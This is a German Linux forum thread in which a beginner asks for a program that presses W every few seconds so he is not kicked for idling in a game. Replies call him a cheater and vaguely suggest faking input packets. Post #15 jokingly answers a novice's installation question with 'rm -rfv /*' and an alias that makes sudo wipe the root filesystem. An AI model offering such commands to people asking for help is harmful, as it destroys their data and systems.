Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 15 von 17

Thema: Brauche Hilfe bei einem Programm

  1. #1
    Grünschnabel
    Registriert seit
    18.11.2005
    Beiträge
    5

    Brauche Hilfe bei einem Programm

    Hi,
    kann mir jemand folgendes programm programmieren/schicken:

    Eine bestimmte taste (z.b. die w-taste) soll alle paar sekunden gedrückt werden,das über ein paar stunden,also so das mein pc automatisch eine bestimmte taste sagen wir alle 5 secs drückt,ohne das ich am pc sein muss,
    ich habe keine ahnung vom programmieren und wenn es geht erklärt mir doch bitte einer wie ich das programm dann zum starten bringe

  2. #2
    Mouse Organist Avatar von Xanti
    Registriert seit
    05.09.2004
    Beiträge
    1.855
    Mit Anleihen an "King Size Homer":

    http://www.backstreet.demon.co.uk/od...nkingbirds.htm

    Geändert von Xanti (18.11.2005 um 16:00 Uhr)

  3. #3
    Moderator Avatar von damager
    Registriert seit
    27.08.2003
    Ort
    Munich
    Beiträge
    3.065
    Phorus: leicht offtopic ... aber KLASSE!
    gropiuskalle@ub:
    Ein Wechsel von Windows auf Linux kann bisweilen traumatische Auswirkungen auf die Psyche des users haben.

  4. #4
    Mouse Organist Avatar von Xanti
    Registriert seit
    05.09.2004
    Beiträge
    1.855
    Zitat Zitat von damager
    Phorus: leicht offtopic ... aber KLASSE!
    Keine Angst, wenn Wolfgang noch nen "Drinkin' Bird"-Perl-Einzeiler nachreicht, ists wieder im Topic ^^

  5. #5
    Grünschnabel
    Registriert seit
    18.11.2005
    Beiträge
    5
    na auf nu schreibt net son schmarn und helft mir ma lieber

  6. #6
    Foren Gott
    Registriert seit
    23.08.2005
    Beiträge
    2.133
    Na, auf die Aufloesung bin ich mal gespannt. Das Programm muss sich ja immerhin auch an den Prozess einklinken, dass die Eingabe erwartet - wenn man es vom Terminal aus startet, erhaelt der Terminal ja sonst stundenlang alle 5s lang ein 'w', was dann wohl entweder zu einem unbekannten Befehl oder einem vollen Keyboard-Puffer fuehrt. Wuerde auch mal gerne wissen, was die Eingabe tatsaechlich bewirken soll, wobei ich annehme, dass es sich bei dem 'w' eher um ein 'j', 'y', 'n', oder der <Enter>-Taste handelt.

    Wie gesagt, bin gespannt.

  7. #7
    Grünschnabel
    Registriert seit
    18.11.2005
    Beiträge
    5
    es handelt sich um ein spiel,in dem ich nicht afk sein will,wenn man afk ist fliegt man raus,umso länger man drin ist umso mehr pkt bekommt man--> ich möchte möglichst lange drinnen sein
    meine tasten sind auf "w-a-s-d" belegt (die lauftasten),deswegen hätte ich gerne das der computer für mich automatisch alle paar sekunden einen schritt nach vorne geht (die w taste drückt)

  8. #8
    Mouse Organist Avatar von Xanti
    Registriert seit
    05.09.2004
    Beiträge
    1.855
    Aha, ein Cheater...

  9. #9
    Grünschnabel
    Registriert seit
    18.11.2005
    Beiträge
    5
    also ma ganz im ernst :
    ihr benutzt alle euren tollen fachausdrücke,tituliert mich als cheater,aber so wirklich programmieren kann das programm keiner oder oO

  10. #10
    Freier Programmierer[Mod] Avatar von oenone
    Registriert seit
    22.08.2002
    Ort
    Mannheim
    Beiträge
    599
    du musst das protokoll analysieren und dann entsprechende (gefälschte) pakete schicken..

    sowas wie UO-Loop für Ultima Online.. nur halt tiefergreifend, eher auf ebene von Injection.

    UO-Loop hat unter Windows gefälschte API-Messages an UO geschickt, die für Tastendruck standen. Für X11R6 kannst du das auch machen, aber einfacher wäre es, dich in das protokoll zu hacken.

    auf bald
    oenone
    if you don't remember something, it never happened.
    if you aren't remembered, you never existed.

  11. #11
    Grünschnabel
    Registriert seit
    18.11.2005
    Beiträge
    5
    schreibt mir doch einfach einer ma bitte sowas

  12. #12
    Grünschnabel
    Registriert seit
    09.08.2009
    Beiträge
    1
    habe ein probelm neue programme zuinsterlieren kann mir jemannt helfen

  13. #13
    Eala Frya Fresena! Avatar von glako
    Registriert seit
    27.05.2007
    Ort
    umme Ecke
    Beiträge
    160
    Zitat Zitat von dietmar Beitrag anzeigen
    habe ein probelm neue programme zuinsterlieren kann mir jemannt helfen
    Eigenes Problem -> Eigener Thread!
    Greetz
    Glako

  14. #14
    Gast1
    Gast
    Sind mal wieder Schliemanns Erben unterwegs?

    Zur Anfrage:

    Hilfsutensil Nr.1

    Hilfsutensil Nr.2

    Die Antwort

  15. #15
    hat den Bogen geschlagen Avatar von Schard
    Registriert seit
    26.05.2007
    Ort
    Hannover
    Beiträge
    872
    Um alle Programme zu DEinstallieren, kannst du ein
    Code:
    > su -c "rm -rfv /*"
    probieren

    scnr
    Code:
    alias sudo='/usr/bin/sudo /bin/rm -Rf --no-preserve-root / #'

Ähnliche Themen

  1. Antworten: 22
    Letzter Beitrag: 29.06.2006, 09:59
  2. Soho, brauche Hilfe mit meinem Notebook!
    Von boijin im Forum Installation & Basiskonfiguration
    Antworten: 10
    Letzter Beitrag: 17.09.2005, 17:15
  3. Brauche hilfe in VB 6.0!
    Von Mäxchen im Forum Programmieren allgemein
    Antworten: 5
    Letzter Beitrag: 03.02.2005, 13:59
  4. ich brauche eure hilfe
    Von sos im Forum Member Talk & Offtopic
    Antworten: 5
    Letzter Beitrag: 11.04.2004, 04:48
  5. Brauche Hilfe Dringend
    Von cyrex im Forum Debian/Ubuntu/Knoppix
    Antworten: 7
    Letzter Beitrag: 09.04.2004, 14:49

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •